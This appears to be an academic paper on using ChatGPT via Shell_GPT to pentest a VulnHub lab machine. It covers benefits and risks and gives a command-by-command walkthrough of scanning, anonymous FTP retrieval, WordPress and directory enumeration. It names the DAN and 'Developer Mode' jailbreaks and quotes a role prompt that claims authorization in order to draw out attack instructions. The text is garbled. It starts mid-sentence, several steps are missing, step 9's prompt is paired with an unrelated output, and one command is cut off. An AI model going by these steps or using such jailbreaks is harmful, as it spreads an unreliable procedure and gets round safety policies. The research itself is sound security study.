Generative AI for pentesting: the good, the bad, the ugly
https://doi.org/10.1007/s10207-024-00835-x
REGULAR CONTRIBUTION
Abstract
This paper examines the role of Generative AI (GenAI) and Large Language Models (LLMs) in penetration testing, exploring the benefits, challenges, and risks associated with cyber security applications. Through the use of generative artificial intelligence, penetration testing becomes more creative, test environments are customised, and continuous learning and adaptation is achieved. We examined how GenAI (ChatGPT 3.5) helps penetration testers with options and suggestions during the five stages of penetration testing. The effectiveness of the GenAI tool was tested using a publicly available vulnerable machine from VulnHub. The tool responded quickly at each stage and helped produce a more complete pentesting report. In this article, we discuss the potential risks, unintended consequences, and uncontrolled AI development associated with pentesting.
Keywords Cyber security · Generative AI · Large language models · Penetration testing · ChatGPT 3.5
$10.5 trillion by 2025.¹ Cyber threats, such as data breaches, ransomware attacks, and identity theft, have become more complex, posing significant risks to individuals, businesses, and governments alike. The consequences of these attacks can be severe, resulting in financial loss, damage to reputation, and even harm to human lives [37]. It is therefore essential to proactively address and mitigate these risks by implementing robust cyber security measures, including advanced tools and techniques that can detect and counteract cyber threats. A penetration test [2], or pentest, can be conducted to evaluate the risks or vulnerabilities in any organisation's network or public-facing applications. Initially a mundane process, pentesting has seen some advancements and automation [1] as the technology evolved. The advent of generative AI (GenAI) has sparked significant interest [3] within the cyber security industry, particularly for its capabilities in enhancing the penetration testing process. Its ability to replicate real-world scenarios facilitates the development of advanced tools capable of detecting a broader range of zero-day vulnerabilities.

OpenAI's ChatGPT is used for the purpose of testing GenAI, although other similar tools can serve as an alternative. Rooted in a foundational Large Language Model (LLM) trained on a massive corpus of text, ChatGPT has proven effective for penetration testing applications.

Research question

This research seeks to investigate the potential advantages, limitations, and impact of integrating GenAI tools into traditional pentesting frameworks, thereby providing a structured avenue to explore, experiment, and discuss the contributions of GenAI in cyber security.

"How can GenAI tools be applied to enhance the efficiency of penetration testing methodologies in cyber security?"

Contributions

The following are the contributions of this paper:

– Firstly, it discusses the advantages, challenges and potential consequences of using GenAI in cyber security, specifically pentesting.
– Secondly, the application of GenAI in a simulated pentesting engagement is demonstrated, thereby verifying that GenAI can produce commands that can be used to conduct a full penetration test.
– Finally, GenAI can be used to produce an excellent and accurate penetration testing report that does not miss any key findings.

Limitations

The field of AI is currently evolving at a multiplicative rate [34]. This paper is limited to the technologies, tools and techniques available prior to June 17, 2023. Moreover, the specific version of ChatGPT 3.5 used in this paper corresponds to its May 24, 2023 release [29].

The rest of the paper is organised as follows: the Good (background of GenAI and its application in pentesting), the Bad (overconfidence in AI, ethical and legal concerns, inherent bias) and the Ugly (responsible AI, privacy and collaborative work) are discussed in Sect. 2, followed by a literature review in Sect. 3. The methodology is presented in Sect. 4 with detailed experiments and steps for reproducing the commands. The results of the study are discussed in Sect. 5 in relation to the methods described in Sect. 4. Section 6 concludes the paper, followed by Sect. 7 explaining the areas that need to be addressed in the future.

1 https://www.esentire.com/resources/library/2022-official-cybercrime-report.

2 Background

This section presents a primer on the topics discussed in this paper. Section 2.1 summarises the concept of GenAI, segueing into Sect. 2.2 where its application to pentesting is introduced. Section 2.3 explains the advantages, the challenges are listed in Sect. 2.4, and the potential risks and consequences of applying GenAI in pentesting are covered in Sect. 2.5. Finally, Sect. 2.6 presents a guideline for how it can be best implemented.

2.1 Overview of generative AI and LLMs

GenAI is a subfield of artificial intelligence that focuses on creating new data, patterns, or models based on existing data. It encompasses various techniques, including deep learning, natural language processing (NLP), and computer vision. DALL-E, MidJourney, Stable Diffusion, Google Bard, GitHub Copilot, Bing AI Chat and Microsoft 365 Copilot are among the most prominent names in GenAI today, but perhaps the most popular is OpenAI's GPT (Generative Pre-trained Transformer), a series of multimodal Large Language Models (LLMs) currently in its fourth iteration. These models are capable of understanding and generating human-like text based on the context of given inputs. They are trained on vast amounts of text data and have demonstrated impressive capabilities in a wide range of applications, including translation, summarisation, and text generation.
2.2 Application of generative AI in penetration testing

One promising application of GenAI in cyber security is pentesting, which involves simulating cyber-attacks on a system or network to identify vulnerabilities, detect potentially exploitable entry points, and assess the effectiveness of security measures. However, as systems become more complex and attacks become more sophisticated, traditional approaches to pentesting are becoming less effective. By leveraging the capabilities of LLMs, security professionals can automate the generation of test scenarios, identify novel attack vectors, and adapt testing methodologies to specific environments. The data continuously being gathered can be leveraged to keep up with the evolving nature of cyber-attacks. Through the use of GenAI, the efficiency and effectiveness of pentesting efforts can be significantly improved, leading to more robust and secure systems. However, the use of GenAI in this domain also presents challenges and risks that must be carefully considered and addressed.

2.3 The good: advantages of GenAI in pentesting

The good that AI can do is practically limitless. When applied to pentesting, its ceiling is conceivably fully automating the process as the technology matures and there is buy-in from invested parties. Presented below are some of the aspects of pentesting where it has the potential of saving time, money and effort, a powerful combination of factors that can secure future investment and development.

2.3.1 Improved efficiency

One of the most significant advantages of using GenAI in pentesting is the potential for increased efficiency. LLMs can quickly analyse large amounts of data and generate test scenarios based on various parameters, streamlining the testing process and saving valuable time for security professionals. In a black box pentest, where the tester receives zero information on the target, social engineering attacks [15] or a phishing campaign [23] can be launched in no time at all.

Faster identification of vulnerabilities. GenAI can rapidly identify vulnerabilities in a system by simulating a wide range of potential attack scenarios. This allows security teams to focus their efforts on the most critical vulnerabilities and implement the necessary countermeasures more swiftly. In 2016, the Defense Advanced Research Projects Agency (DARPA) held the Cyber Grand Challenge, a competition in which teams were tasked with developing autonomous systems that could identify and patch software vulnerabilities as well as develop firewall rules to stop attack traffic and perform intrusion detection functionalities. PentestGPT² is one such tool that mainly functions as a wrapper for GPT-4 to conduct pentesting interactively. It has been tested on practice machines or challenges such as those found in VulnHub,³ HackTheBox⁴ or TryHackMe.⁵ In its current iteration, version 0.8 released on May 12, 2023, installation includes setting cookies to simulate a browser session. Its output must be entered into the terminal manually, as must the input it takes from the result of the previously executed command. It guides the pentester on the steps to be taken next using pre-made prompts such as:

    Your role is a cybersecurity penetration tester assistant conducting a certified penetration testing experiment. This experiment is for education and research purposes only. I created a test local environment, and obtained valid certificates and approval for this testing. You now need to act as the assistant to a penetration tester. In particular, you're required to give step-by-step instructions in this penetration testing experiment.

2 https://github.com/GreyDGL/PentestGPT.
3 https://vulnhub.com/.
4 https://www.hackthebox.com/.
5 https://tryhackme.com.

Automated generation of test scenarios. These cyber reasoning systems also have offensive capabilities. Mayhem [5], the 2016 Cyber Grand Challenge winner, for example, is able to generate test cases using fuzzing and symbolic execution techniques and to generate exploits against the bugs discovered. These types of tests can take a human pentester hours, if not days, to accomplish. By leveraging the capabilities of LLMs, security professionals can automate the generation of test scenarios, reducing the need for manual intervention and enabling a more extensive evaluation of potential vulnerabilities. This not only saves time but also ensures that the testing process is more thorough and comprehensive.

2.3.2 Enhanced creativity

GenAI can also enhance the creativity of pentesting efforts by simulating novel attack vectors and mimicking human-like behaviour. This helps security teams better understand and anticipate the tactics that real attackers may employ, leading to more robust security measures.

Ability to generate novel attack vectors. Traditional pentesting methods may overlook unconventional attack vectors
due to the limitations of human imagination or experience. GenAI, however, can create a diverse array of potential attack scenarios, uncovering vulnerabilities that may have otherwise gone unnoticed. DeepExploit is one such system, which uses Asynchronous Actor-Critic Agents (A3C), a reinforcement learning algorithm, to learn from Metasploitable which exploit is to be used against specific targets [41]. Presented at DEFCON 25, an annual hacker convention, was DeepHack [33], an automated web pentesting tool able to craft SQL injection strings without prior knowledge of the system, relying only on the target database's responses.

Mimicking human-like behaviour. GenAI can simulate the behaviour of real attackers by learning from historical attack patterns and adapting to new tactics. This provides security professionals with a more realistic understanding of how adversaries may operate, enabling them to implement more effective countermeasures. Chen et al. [8] discuss GAIL-PT (Generative Adversarial Imitation Learning-based intelligent Penetration Testing), a state-action pair-based automated penetration testing framework, which involves creating a knowledge base of penetration testing expertise upon which to train the model. It was tested against Metasploitable2 and outperformed the state-of-the-art method, DeepExploit.

2.3.3 Customised testing environments

GenAI can be tailored to the unique needs of individual organisations, allowing for customised testing environments that account for specific systems, infrastructures, and domain-specific knowledge.

Adaptable to unique systems and infrastructures. GenAI models can be trained on data specific to an organisation's systems and infrastructure, ensuring that the pentesting process is aligned with the unique requirements of the target environment. This enables security teams to focus on vulnerabilities that are most relevant to their organisation. CyCraft APT Emulator [11] was designed to "generate attacks on Windows machines in a virtualised environment" for the purpose of demonstrating how a machine learning (ML) model can detect cyber-attacks and trace them back to their source. This model was used in Fuchikoma [10], a threat-hunting ML model based on open-source software.

Incorporation of domain-specific knowledge. By incorporating domain-specific knowledge into the GenAI models, security professionals can ensure that the pentesting process is more contextually relevant and effective. This may include industry-specific regulations, compliance requirements, or unique organisational policies and procedures. DeepArmor, an endpoint detection and protection solution by SparkCognition, has partnered with Siemens Energy to produce an AI-driven tool [39] specifically for isolated networks in Operational Technology (OT) domains that does not rely on signatures, heuristics or rules requiring network connectivity. It utilises a predictive approach through an agent that is hosted and executed on-device.

2.3.4 Continuous learning and adaptation

Another advantage of using GenAI in pentesting is its ability to continuously learn and adapt based on new information and past experiences. This allows for real-time adjustments to the testing process and ensures that the pentesting efforts remain relevant and up to date.

Real-time adjustments to the testing process. As GenAI models receive feedback from the pentesting process, they can refine their approach and make real-time adjustments to their tactics. This continuous improvement enables security professionals to stay ahead of evolving threats and maintain a high level of security. AttackIQ provides a service that simulates breaches and attacks [4] for the purpose of validating security controls, finding security gaps, or testing and teaching ML tools to ensure that they adapt to threats and refine their accuracy and effectiveness.

Learning from past tests and experiences. GenAI models can learn from the successes and failures of past tests, incorporating this knowledge into their future testing efforts. Their capacity to analyse historical data on successful attacks against an organisation, including the tactics, techniques, and procedures (TTPs) used by attackers, allows them to generate new attack scenarios based on previous successful attacks, with slight modifications accounting for changes in the organisation's security posture. They can also look at unsuccessful attacks, analyse the types of defences blocking those attacks, and use that information to generate new attack scenarios bypassing those defences, allowing security teams to identify and remediate proverbial chinks in their cyber security armour.

2.3.5 Compatibility with legacy systems

Similar to how a child born after 2010 can eventually figure out how to interface with a rotary phone, GenAI can interface with and "understand" legacy computer systems after receiving training on a large corpus of text data. Once an unsupervised language model has undergone pretraining, it can then be fine-tuned using labelled data specific to legacy systems, which improves performance and conditions its focus on this task. Many large organisations still rely on mainframe systems for critical business operations; these are often complex and difficult to maintain, which makes them highly vulnerable to security threats. Similarly, outdated and insecure protocols and older software that are no longer supported by the vendor are also vulnerable to known exploits and attacks. Training AI models on data specific to legacy systems can allow them to generate possible exploits and help cyber security teams to identify and remediate these vulnerabilities. For instance, these systems can be modernised through NLP-based interfaces, Application Programming Interface (API) wrappers or API calls that translate modern programming languages into legacy system commands or instructions. This way, developers are able to use familiar tools and languages to interact with the legacy system. GenAI can also be used to refactor legacy code and convert it to a more modern form.
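To make the API-wrapper idea above concrete, the Python sketch below shows how a thin translation layer might map a modern, structured request onto a command string that a legacy system understands. Every function, transaction and command name here is hypothetical and invented purely for illustration; none of it comes from the paper or from any real mainframe product.

    # Hypothetical sketch of a wrapper that translates modern, structured calls
    # into legacy command strings. All names and formats are invented.

    LEGACY_COMMANDS = {
        # modern action name -> legacy command template (made-up syntax)
        "query_balance": "CALL 'PROD.LIB(BALINQ)' PARM('{account}')",
        "list_users": "CALL 'PROD.LIB(USRLST)' PARM('{department}')",
    }

    def to_legacy_command(action, **params):
        """Translate a modern API-style call into a legacy command string."""
        try:
            template = LEGACY_COMMANDS[action]
        except KeyError:
            raise ValueError(f"Unsupported action: {action}")
        return template.format(**params)

    if __name__ == "__main__":
        # A developer keeps a familiar, modern calling convention...
        cmd = to_legacy_command("query_balance", account="12345")
        # ...while the wrapper emits the command the legacy system expects.
        print(cmd)

A GenAI model fine-tuned on legacy-system documentation could, in principle, generate or maintain such mappings, which is the modernisation pathway the paragraph above describes.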
2.4 The bad: challenges and limitations of GenAI in pentesting

While GenAI offers many advantages in pentesting, it is crucial not to become overly reliant on these technologies. Human oversight remains essential for ensuring accurate and effective results, as well as identifying and addressing any false positives or negatives generated by the AI. As an example, one security vulnerability is that the input an LLM ingests may have come from an untrusted or, worse, maliciously injected source [16]. In that paper, a simulated Wikipedia page containing incorrect information was used as training data, which had the effect of contaminating the output of a user query, an attack bearing similarities to "search poisoning".

Human oversight is still essential. Despite the capabilities of GenAI, human expertise remains a critical component of the pentesting process. Security professionals must evaluate the AI-generated results, validate the identified vulnerabilities, and make informed decisions about the necessary countermeasures. Overreliance on AI without human intervention may lead to overlooked vulnerabilities or other security issues. In the infamous 2019 Capital One breach, the automated Intrusion Monitoring/Detection system in place did not raise the necessary alarms, allowing the intruder to maintain a presence in the network for more than 4 months and exfiltrate a substantial amount of data [22]. This incident highlights the critical role of human oversight in the pentesting process, as even the most advanced automated tools require expert configuration and validation. Novel attacks and vulnerabilities can also be overlooked, since GenAI models are usually trained on known attack patterns and techniques. A model might be able to detect and identify a threat but fail to recognise the complexity of the attack. Companies might consider AI to be sufficient, but the expertise of a security professional is at this point still crucial in interpreting results and determining their appropriateness in the specific context.

AI-generated false positives and negatives. GenAI models, like any other technology, are not infallible. They may generate false positives, identifying vulnerabilities that do not pose a real threat, or false negatives, overlooking actual vulnerabilities. Security professionals must be vigilant in reviewing the AI-generated results and address any discrepancies to ensure a comprehensive and accurate assessment of the target environment. Papernot et al. [32] posited (correctly) that ML models are vulnerable to malicious inputs and can be modified to "yield erroneous model outputs while appearing unmodified to human observers". Images can be modified in a way that is imperceptible to humans but causes models to misclassify the image, or text can be subtly changed, such as by altering the word order, causing the model to misinterpret the intended meaning. In both examples, GenAI can serve as a vessel for false or misleading information.

GenAI continues to creep into our daily lives at an accelerated and profound rate. While these advancements offer substantial advantages to businesses, governments, and individuals, the associated challenges are equally significant. The rapid transformation driven by technology is altering the ways in which we live, work, and govern at an unparalleled speed. This evolution generates new employment opportunities, fosters connections and generates prosperity overall, while on the other hand it renders some professions obsolete, contributes to divisive ideologies and can also intensify disparity. In essence, the situation is intricate. Currently, the ethical ramifications of GenAI and its integrations and applications are more salient than at any previous point in the past few years, with it recently coming into the public's view. The swift progress of technology-driven transformation continually outpaces the efforts of policymakers and regulators, who, burdened with the time-consuming process of enacting or updating legislation, policies and regulations, consistently struggle to keep up. This means governments can only respond rather than be proactive in their approach. And as with any disruptive technology, the use of GenAI raises ethical and legal concerns, especially in pentesting, where the risk of unauthorised access to sensitive data or systems may have severe consequences and the information gleaned may be misused by malicious actors.

Unauthorised access to sensitive data. Pentesting often involves accessing sensitive data or systems to identify vulnerabilities. While GenAI may streamline this process, it also raises concerns about the potential misuse of this access or the inadvertent exposure of sensitive information. Security professionals must ensure that they adhere to ethical
guidelines and legal requirements to protect the confidentiality and integrity of the data involved.

Privacy issues. In the first instance, OpenAI's scraping of data from publicly available books, articles, websites and posts would have included personal information obtained without consent, a clear violation of privacy. While the data is publicly available, using it can be a breach of contextual integrity, a legal principle requiring that information not be revealed outside of the context in which it was originally produced [14]. Another privacy risk that pentesters may come across is providing AI platforms with sensitive information, such as code, that could be used for training the model and therefore be made available to anyone asking the right questions. More and more tech companies are banning the use of AI because of this. Samsung recently banned the use of ChatGPT on company devices after employees were caught uploading sensitive code [18]. Instead, they are reportedly preparing in-house AI tools as an alternative. Microsoft, which recently invested US$10 billion in OpenAI [25, 30], plans to offer a privacy-focused version of ChatGPT that will run on dedicated cloud servers where data is isolated from other customers, tailored to companies that have concerns regarding data leaks and compliance [9].

Potential for misuse by malicious actors. As GenAI technologies become more advanced, there is a risk that they may be co-opted by malicious actors to develop more sophisticated cyberattacks. This highlights the importance of securing GenAI models and technologies, as well as fostering collaboration between organisations and governments to prevent their misuse.

2.4.3 Inherent bias in the model

GenAI models are only as good as the data they are trained on. Biased or unrepresentative training data may result in unfair outcomes, which can have significant consequences in the context of cyber security.

Possibility of biased or unfair results. If GenAI models are trained on biased or unrepresentative data, they may generate biased test scenarios or overlook vulnerabilities that are specific to certain systems, user groups, or industries. Security professionals must be aware of these potential biases and take steps to ensure that their AI models are trained on diverse and representative datasets.

Training data quality and representativeness. Ensuring that GenAI models are trained on high-quality, representative data is essential for producing accurate and reliable results in pentesting. This may involve curating and augmenting training datasets, as well as monitoring and updating the AI models as new data becomes available.

2.5 The ugly: potential risks and unintended consequences

2.5.1 Escalation of cyber threats

The increasing sophistication of GenAI in pentesting may inadvertently lead to an escalation of cyber threats, as attackers adapt to these advanced technologies and develop new tactics to exploit vulnerabilities. While it can be used for good in pentesting, as discussed in Sect. 2.3.1 Improved Efficiency, the same strategy can also be employed by malicious actors. Gone are the days when phishing emails were easily filtered through spelling mistakes and obvious grammatical errors [19]. Europol issued a press release [13] identifying areas of concern as LLMs continue to improve, empowering criminals to abuse their capabilities for malicious use. These include the ability to create hyper-realistic text, audio or even video "deepfakes" that can reproduce language patterns or impersonate the writing styles of specific individuals or groups. Trust is easily acquired and disinformation is easily spread when it comes from a verified authority.

Advanced persistent threats. As GenAI models become more capable of simulating complex attack scenarios, there is a risk that malicious actors will also adopt these technologies to create advanced persistent threats (APTs). APTs are highly targeted, stealthy, and often state-sponsored cyberattacks that can cause significant damage to an organisation's infrastructure and reputation. Any enterprising criminal may be able to use GenAI to create malicious code with only a small amount of technical knowledge [44]. During the early days, a group of researchers [6] showcased how ChatGPT was used to create malicious VBA code embedded in an Excel document through iteration and by providing it with creative prompts.

Autonomous and self-propagating attacks. The advancements in GenAI may lead to the development of autonomous and self-propagating cyberattacks. These attacks could be designed to automatically adapt and evolve based on the target environment, making them more challenging to detect and defend against.

Researchers from CyberArk [38] were able to create polymorphic malware by simply prompting ChatGPT to regenerate multiple variations of the same code, making it unique each time, or by adding constraints over each iteration to bypass detection. In February 2023, BlackBerry conducted a survey of 1,500 IT decision-makers revealing the perception that ChatGPT is already being used by nation-states for malicious purposes and that many are concerned about its potential threat to cyber security [7], either through its use as a tool to write better malware or to enhance attackers' skills.
fact that they are closely related, our work is focused on testing and certifying the commands generated by GenAI tools, and we ensure that the testing is completed with recommendations.

A phishing attack scenario using ChatGPT is presented by Grbic and Dujlovic [15], along with an overview of social engineering attacks and their prevention. JavaScript is used in the second part of the paper to improve the phishing attack. While it is interesting to see how phishing attacks can be easily launched with ChatGPT, it has not been tested how they would pass through organisation-level defence controls. Additionally, many other tools can be used to create highly sophisticated phishing emails besides GenAI.

While there is plenty of secondary literature available, some blogs provide in-depth discussion and technical details on how to use GenAI tools [12, 26, 35]. Our paper is the first of its kind to perform an in-depth and step-by-step analysis of penetration testing using GenAI.

4 Methodology

4.1 Preparation

A series of preparatory steps was undertaken prior to conducting the pentesting engagement using GenAI. These steps included selecting the most suitable AI for the task, establishing a reliable infrastructure to support the activity, and devising a method for the pentester to interface with the API. Once the preparations were completed, the experimentation was able to begin.

4.1.1 Selection of the GenAI model

Stage one involved selecting an appropriate GenAI. With ChatGPT being the most popular tool among GenAIs, it will be used in the succeeding experiments to demonstrate techniques in which it can be applied to each phase of pentesting. OpenAI's ChatGPT, with its advanced language understanding and generation capabilities, proved to be the most obvious choice. Its corpus of text was trained on a diverse range of publicly available material, which makes it capable of generating human-like text based on the input provided. This feature was particularly useful in the context of pentesting, where clear, concise and accurate communication is essential.

4.1.2 Preparation of the pentesting environment

Oracle VM VirtualBox, a type 2 hypervisor running atop the host machine's Windows operating system (OS), was used as the virtualisation software to manage the pre-built Kali Linux virtual machine (VM) from kali.org [28]. Kali Linux, an open-source Debian-based Linux distribution popular among penetration testers, security researchers, reverse engineers and others in the cyber security industry due to the bundle of pentesting tools already installed, is the OS running on the pentester's machine, referred to as the local machine throughout this paper. The target machine that pentesting was performed on, or the remote machine, was randomly selected from VulnHub, a repository of offline VMs that can be used by learners for practicing their skills within their own environments. "PumpkinFestival", the final level of the 3-part Mission-Pumpkin series [21] by Jayanth, released on 17th July 2019, was selected as the target for the experiment. It contained various vulnerabilities that simulate real-world scenarios. The ultimate goal was to crack or obtain root access to the system and collect flags along the way. As background, Capture the Flag (CTF) [24] is a cyber security competition held to test participants' skills in information security. It was adapted from the traditional outdoor game where two or more teams each have a flag, with the objective of capturing the other teams' flag (which may be hidden or buried) located at their respective bases and bringing it safely back to their own. This attack-defence format is one of two CTF formats and was first held in 1993 at DEFCON, a cyber security conference held annually in Las Vegas, Nevada. The other is a Jeopardy-style format where teams attempt to complete as many challenges as possible, each of varying difficulty and from a diverse range of security topics.

4.1.3 Integration of AI into the environment

The final step in the preparation process was to integrate ChatGPT's API into the pentesting environment. For this, Shell_GPT (sgpt) [43], a Python-based command line interface (CLI) tool that makes use of ChatGPT's API to answer questions, generate shell commands, code snippets and documentation, was integrated into the pentesting environment. Using ChatGPT's API to connect with tools used in pentesting, such as Nmap [27], Nessus and OpenVAS, involves using Python or another scripting language to create an interaction between ChatGPT and each tool. Doing so enables direct interfacing for the execution of scans and interpretation of results automatically. Without this integration, it is as if the prompts were issued through the web interface instead. This advantage allows for automated guidance during the pentesting process. As the tools generate output, ChatGPT can immediately interpret the results and provide immediate advice on the next steps, reducing the time spent on analysing the results manually. There is also the advantage of contextual understanding from ChatGPT directly interacting with the output, which can lead to more accurate or relevant suggestions. Moreover, the pentesting workflow becomes more streamlined and reduces the need for manual handling of input and output between the tool and the AI. Ultimately, integrating ChatGPT into the CLI in the experimentation phase allowed for the evaluation of the practical applicability and effectiveness of GenAI in real-world pentesting scenarios. Assessing how well it can interpret the output of professional penetration testing tools and provide useful guidance based on that output is one of the goals of the experiment. As an aside, the experimentation makes a distinction between sgpt and ChatGPT: where sgpt is mentioned, ChatGPT is also indicated, but where ChatGPT is specifically mentioned it does not necessarily denote that sgpt is concurrently used. There is also the distinction between ChatGPT in general and ChatGPT using its web interface, which is explicitly stated.
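As an illustration of this integration, the following Python sketch runs a scan and pipes its raw output back into sgpt for interpretation. It is a minimal sketch only: the nmap flags, the prompt wording, and the reliance on sgpt accepting piped standard input (a documented feature of Shell_GPT) are assumptions made for this example rather than the exact mechanism used in the experiment.

    import subprocess

    TARGET = "10.0.2.15"  # the remote machine used later in the experiment

    def run(cmd, stdin_text=None):
        """Run a command and return its standard output as text."""
        result = subprocess.run(
            cmd, input=stdin_text, capture_output=True, text=True, check=False
        )
        return result.stdout

    if __name__ == "__main__":
        # 1. Execute the scan (here a service/version scan with Nmap).
        scan_output = run(["nmap", "-sV", TARGET])

        # 2. Hand the raw output to the model via sgpt and ask for guidance,
        #    instead of copying it into the web interface manually.
        advice = run(
            ["sgpt", "Interpret this nmap output and suggest the next pentesting step"],
            stdin_text=scan_output,
        )
        print(advice)

The same loop generalises to other tools such as Nessus or OpenVAS by swapping the command executed in the first step.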
4.1.4 Cracking with the help of GenAI

With the setup complete, the pentesting experiment proceeded through prompts or interactions with ChatGPT via the CLI, using sgpt's feature to execute shell commands, as well as regular prompting of the AI for guidance on how to proceed at each phase. Note that while the target VM selected has not been pentested by the author prior to the experiment, pentests have been conducted on similar machines from VulnHub and elsewhere. Essentially, the approach in this experiment was to simulate a beginner pentester who has previously used pentesting tools manually. As a beginner, the commands, arguments and parameters of various pentesting tools are not yet ingrained in memory, and constantly referring to manuals and online guides is necessary. This highlights the potential for using ChatGPT as an aid in pentesting.

Jail breaking ChatGPT. Due to policies put in place by OpenAI, ChatGPT and its other GenAI models are bound not to violate its content policy by producing materials that condone illegal activity, such as generating malware [31], which pentesting can be misconstrued as. ChatGPT will outright refuse to output information that has negative connotations or effects. When queried for the "list of IP addresses associated with tesla.com" in its database, for example, it will instead reply with how to obtain this information (see Fig. 1). Jail breaks such as "DAN" (Do Anything Now) or "Developer Mode" [45], while unethical and an infringement of OpenAI's usage policies, are methods that security researchers and hackers alike have used to extract information that would otherwise not be available. They allowed ChatGPT to bypass its programmed ethical barriers to output implicitly immoral or unethical responses.

4.2 Experimentation

From Reconnaissance to Exploitation. A summary of the steps taken in the simulated pentesting engagement is listed below. Each step begins with a short description of its objective, followed by the Terminal Input for GenAI, which is the prompt given to Shell_GPT (sgpt) [43], the interface between the local machine and the GenAI, to extract its response. The result of the prompt is subsequently shown under Terminal Output and, finally, each step concludes with an explanation. For conciseness, prompts that were used during the trial-and-error process were excluded.

Step 1 - Find the local machine's IP address.

Objective: Establishes the initial connectivity information necessary for further penetration testing activities by identifying the local machine's IP address.

Terminal Input for GenAI:

    sgpt --shell "find my local ip address"

Terminal Output:

    ip addr show | grep "inet" | awk '{print $2}' | cut -d '/' -f1

Explanation: Knowing the Internet Protocol (IP) address and specifying which network interface card (NIC) is in use are two pieces of information necessary for subsequent pentesting phases. Determining whether the pentest is being conducted inside or outside the target network is crucial for selecting appropriate scanning and attack techniques. Differentiating between the local IP address in logs and network traffic allows for easier interpretation of the results.

Step 2 - Probe the network.

Objective: Enumerates active hosts on the target network to identify potential targets and understand the network layout, aiding in the planning of subsequent attack vectors.

Terminal Input for GenAI:

    sgpt --shell "probe the network 10.0.2.0/24"

Terminal Output:

    nmap -sn 10.0.2.0/24

Explanation: Similar to finding the local machine's IP address, enumerating the network helps determine which hosts are active on the target network and identify potential targets for further assessment and exploitation. It determines network topology, including IP ranges and subnets, and assists in
understanding the network layout, which is crucial for planning subsequent attack vectors.

Step 3 - Scan the remote machine.

Objective: Discovers open services, ports, and the operating system running on the identified target, assisting in pinpointing potential vulnerabilities for exploitation.

Terminal Input for GenAI:

    sgpt --shell "scan 10.0.2.15 on all ports to find out OS, vulnerabilities"

Step 4 - Anonymous FTP login.

Terminal Input for GenAI:

    sgpt --shell "login anonymously to ftp 10.0.2.15, list the contents and download the file secrets\token.txt"

Terminal Output:

    ftp 10.0.2.15; anonymous; ls; get secrets/token.txt

Explanation: After successfully logging in to the FTP server anonymously, directory traversal was performed, which resulted in discovering the file named secrets/token.txt, which was then downloaded.
Step 5 - Accessing the contents of token.txt.

Explanation: Following the FTP login, finding out the file's contents was the next step, which then revealed the first token.

Step 6 - HTML source code.

Objective: Inspect the source code of a webpage served by an Apache server on the remote machine to gather additional information.

Terminal Input for GenAI:

    sgpt --shell "show the source code of http://10.0.2.15"

Terminal Output:

    curl http://10.0.2.15

Explanation: Another service running on the remote machine is an Apache webserver on port 80 that serves the Pumpkin Festival webpage. sgpt was used to view its source code.

Objective: Discover other users and URLs by examining network scan results, enhancing the attacker's understanding of the target system.

Terminal Input for GenAI:

    sgpt --shell "show the source code of http://10.0.2.15/store/track.txt"

Terminal Output:

    curl http://10.0.2.15/store/track.txt

Explanation: Another URL identified during the nmap scan revealed a third user, admin, which was also added to users.txt.

Step 9 - Domain identified: pumpkins.local.

Objective: Identify the domain and modify the hosts file to ensure proper domain resolution to further facilitate interaction with the target network.

Terminal Input for GenAI:

    sgpt --shell "add 10.0.2.15 to hosts as pumpkins.local"

Terminal Output:

    curl http://pumpkins.local | grep Token

Explanation: Using the same technique as in step 6, the HTML source code of http://pumpkins.local was curled, but this time filtering for the word Token.

Step 11 - Wordpress scan.
Objective: Aid the exploitation phase by conducting a scan on a WordPress site to identify possible vulnerabilities.

Terminal Input for GenAI:

    sgpt --shell "scan wordpress site http://pumpkins.local and output it in a file called wpscan.txt"

Terminal Output:

    wpscan --url http://pumpkins.local -o wpscan.txt

Step 12 - Piping results into sgpt for analysis.

    Based on the output of the WPScan tool, there are several potential vulnerabilities that could be exploited in the WordPress installation on the target machine. Here are some of the key findings:
    - The WordPress version identified (4.9.3) is insecure and was released on 2018-02-05. This means that there may be known vulnerabilities that could be exploited to gain unauthorized access to the system or compromise its security.
    - The external WP-Cron seems to be enabled, which could potentially be used to launch denial-of-service attacks against the WordPress site.
    - The version of the "twentyseventeen" theme in use is out of date (version 1.4), which could potentially contain known vulnerabilities that could be exploited to gain unauthorized access to the system or compromise its security.
    - Registration is enabled, which could potentially allow attackers to create new user accounts with elevated privileges.
    - The upload directory has listing enabled, which could potentially allow attackers to view and download sensitive files.

    To further investigate these potential vulnerabilities, you could perform additional scans and tests using tools such as Metasploit, Burp Suite, or OWASP ZAP. These tools can help you identify and exploit specific vulnerabilities in the WordPress installation, and can provide more detailed information about the security posture of the target system.

Explanation: The contents of wpscan.txt was piped or forwarded to sgpt in chat mode, which gave an output of its analysis listing vulnerabilities that can be further exploited.

Terminal Input for GenAI:

Step 14 - Gobuster scan with wordlist.

Objective: Perform a directory and file brute force enumeration on the WordPress site using gobuster to discover additional resources or endpoints.

Terminal Input for GenAI:

    sgpt --shell "gobuster scan http://pumpkins.local for php,html,txt,jpg,gif,png,zip,tar,gz,gpg,pem using wordlist dirbuster directory-list-2.3-medium but do not display progress"

Terminal Output:

    gobuster dir -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://
Explanation: To further enumerate the Wordpress site, a tool called gobuster, in tandem with a wordlist containing a list of commonly used filenames, was used for this scan.

Step 15 - license.txt and the third token.

Objective: Retrieve a token among the discovered files.

Terminal Input for GenAI:

    sgpt --shell "get content of http://pumpkins.local/license.txt filter for Token"

Terminal Output:

    curl http://pumpkins.local/license.txt | grep Token

Explanation: A file named license.txt was revealed in the gobuster scan and was found to contain another token.

Step 16 - Show the contents of readme.html.txt.

Objective: Display the contents of a file for inspection and verification.

Terminal Input for GenAI:

    sgpt --shell "show the contents of readme.html.txt"

Terminal Output:

Explanation: From the gobuster scan, a file named readme.html.txt was also discovered. It was found to contain a coded message.

    sgpt --chat pentesting "python script to decode base62 hash K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s" > b62dec.py

Terminal Output:

    Here is a Python script that decodes the base62 hash "K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s" using the steps I outlined in my previous response:

    base62_dict = {
        '0': 0,
        '1': 1,
        '2': 2,
        ...
        'X': 59,
        'Y': 60,
        'Z': 61
    }

    base62_str = "K82v0SuvV1En350M0uxiXVRTmBrQIJQN78s"
    base10_num = 0
    for i, char in enumerate(base62_str[::-1]):
        base10_num += base62_dict[char] * (62 ** i)

    ascii_str = ""
    while base10_num > 0:
        ascii_str = chr(base10_num % 256) + ascii_str
        base10_num //= 256

    print(ascii_str)

